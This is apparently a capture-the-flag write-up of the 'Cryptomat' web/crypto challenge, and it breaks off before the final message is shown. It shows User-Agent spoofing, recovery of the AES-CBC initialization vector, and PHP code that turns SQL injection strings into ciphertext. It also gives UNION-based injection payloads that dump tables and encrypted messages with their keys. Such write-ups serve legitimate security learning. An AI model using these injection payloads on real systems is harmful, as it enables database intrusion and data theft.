Cryptomat is back! You know the drill. Get the key from Dog.
This was a nice web / crypto challenge. We first stumble upon an error when we try to access the website:
You are not using a secure browser! (Compatible browsers expose the string SECURE in the useragent).
Okay, this is not hard to bypass. The server can find out which browser we are using by looking at the User-Agent header in our HTTP request. We just have to send User-Agent: SECURE. But crafting our own requests every time is annoying, so we used a Firefox add-on : « User-Agent switcher ». We are now ready for the challenge.
The website lets us send messages to other people with a key. The text is encrypted with AES-128 in CBC mode (and output in base64). We noticed that the server sent a Set-Cookie header « admin=0 » on the domain « admin.local ». Sending a request to /admin.php with a Host: admin.local showed us some informations like the number of accounts/messages, but nothing interesting.
Firstly, we’re gonna try to decrypt our own messages. I created a message with the key « abcd » and the message « abcdabcdabcdabcdabcdabcdabcd ». The resulting ciphertext is mq8jyy5npsr3t1DR/33B4ZlY304+NOCGLXGp7stWcKk=. If we try to decrypt this ciphertext :
<?php $c = "mq8jyy5npsr3t1DR/33B4ZlY304+NOCGLXGp7stWcKk="; echo mcrypt_decrypt(MCRYPT_RIJNDAEL_128, "abcd", base64_decode($c), MCRYPT_MODE_CBC);
We get something like « Y Q »S30PYR4]XZ- abcdabcdabcd ». This is due to the Initialization Vector used by CBC mode. We should recover it. For that, we just have to XOR the 16 first chars with « abcdabcdabcdabcd ». The IV found is « 8k2F2QS480W998Nm ». We can now correctly encrypt / decrypt messages 🙂
We found the bug by typing random stuff in the Search form. The search form allows us to search for a plaintext in our messages knowing the key. But how does the server search for it? Basically, the given plaintext is encrypted with the key, and is then used in a SQL query for the search. Yes, there is a SQL Injection! Example with the query « aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa » and the key « aaaa » :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘jÆŽÝv>Ç—¿˜¶ » ORDER BY id ASC LIMIT ?, 10’ at line 1
The error is due to a quote » in the encrypted message. We now have to generate correct queries which will encrypt to some SQL injection. We can simply do that by decrypting a SQL injection :
<?php $plaintext = '" or "1"="1'; $ciphertext = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, "a", $plaintext, MCRYPT_MODE_CBC, "8k2F2QS480W998Nm"); echo urlencode($ciphertext);
Going to search.php?key=a&query=[result of the PHP script] and we can see that our injection works! Let’s try some simple union:
» union select 1,2,3–
We always got errors. Impossible to insert comments (–, #, /* …). The errors were was due to a column « id », as we could see in the previous SQL errors. This injection worked:
» union select 1 as id, « 1
The used SELECT statements have a different number of columns.
» union select 1,1,1,1,1,42,1 as id, »1
This injection works perfectly! 😀 We’re gonna use the column of 42. The database is MySQL ; let’s see the tables and the columns.
» union select 1,1,1,1,1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1 as id, »1
The tables are « message » and « user ». The user table contains the passwords of the user. We managed to get Dog’s password, but it was full of non-printable characters. We didn’t arrive to login as Dog. We therefore directly tried to view the encrypted messages in the database.
» union select 1,1,1,1,1,(select concat_ws(« <br> », key, text) from message where id=1),1 as id, »1
This showed us the first message, encrypted, but with its corresponding key. Decrypting it with our PHP script revealed us the plaintext : « GUESS WHAT? ». We repeated this with other message ids = 2, 3, 4… Here are the plaintexts:
GUESS WHAT? you smell !!!!!!!!!!!!!!!!! lol
And the sixth message: